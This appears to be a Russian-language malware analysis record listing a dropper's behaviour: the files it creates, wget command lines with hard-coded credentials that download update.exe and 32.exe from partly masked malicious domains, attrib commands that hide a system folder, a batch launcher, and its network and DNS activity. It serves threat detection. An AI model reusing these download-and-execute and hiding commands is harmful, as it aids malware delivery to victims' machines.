Техническая информация
- '%TEMP%\update.exe' (загружен из сети Интернет)
- '%TEMP%\32.exe' (загружен из сети Интернет)
- '%TEMP%\32.exe'
- '%TEMP%\1.tmp\wget.exe' --tries=5 --user=admin --password=228228 http://do#####d1.trivialnet.pw/32.exe -c
- '<SYSTEM32>\attrib.exe' +S +H %WINDIR%\AppUpdate
- '%TEMP%\update.exe'
- '%TEMP%\1.tmp\wget.exe' --tries=5 --user=updater --password=upd228 http://do####ad1.hyips.pw/update.exe -c
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\starter.bat" "
- '%TEMP%\1.tmp\wget.exe' --tries=5 --user=updater --password=upd228 http://do#######.microliteupdate.net/update.exe -c
- '%TEMP%\1.tmp\wget.exe' --tries=5 --user=admin --password=228228 http://do#####d1.regexxx.pw/32.exe -c
- %TEMP%\1.tmp\elevate.exe
- %TEMP%\1.tmp\update.exe
- %TEMP%\1.tmp\32.exe
- %TEMP%\1.tmp\waitfor.exe
- %TEMP%\1.tmp\starter.bat
- %TEMP%\1.tmp\wget.exe
- %TEMP%\1.tmp\updater.exe
- %TEMP%\1.tmp\update.exe в %TEMP%\update.exe
- %TEMP%\1.tmp\32.exe в %TEMP%\32.exe
- 'do#######.microliteupdate.net':80
- 'do#####d1.trivialnet.pw':80
- 'do####ad1.hyips.pw':80
- 'do#####d1.regexxx.pw':80
- http://do#######.microliteupdate.net/update.exe
- http://do#####d1.trivialnet.pw/32.exe
- http://do####ad1.hyips.pw/update.exe
- http://do#####d1.regexxx.pw/32.exe
- DNS ASK do#######.microliteupdate.net
- DNS ASK do#####d1.trivialnet.pw
- DNS ASK do####ad1.hyips.pw
- DNS ASK do#####d1.regexxx.pw
- ClassName: '' WindowName: ''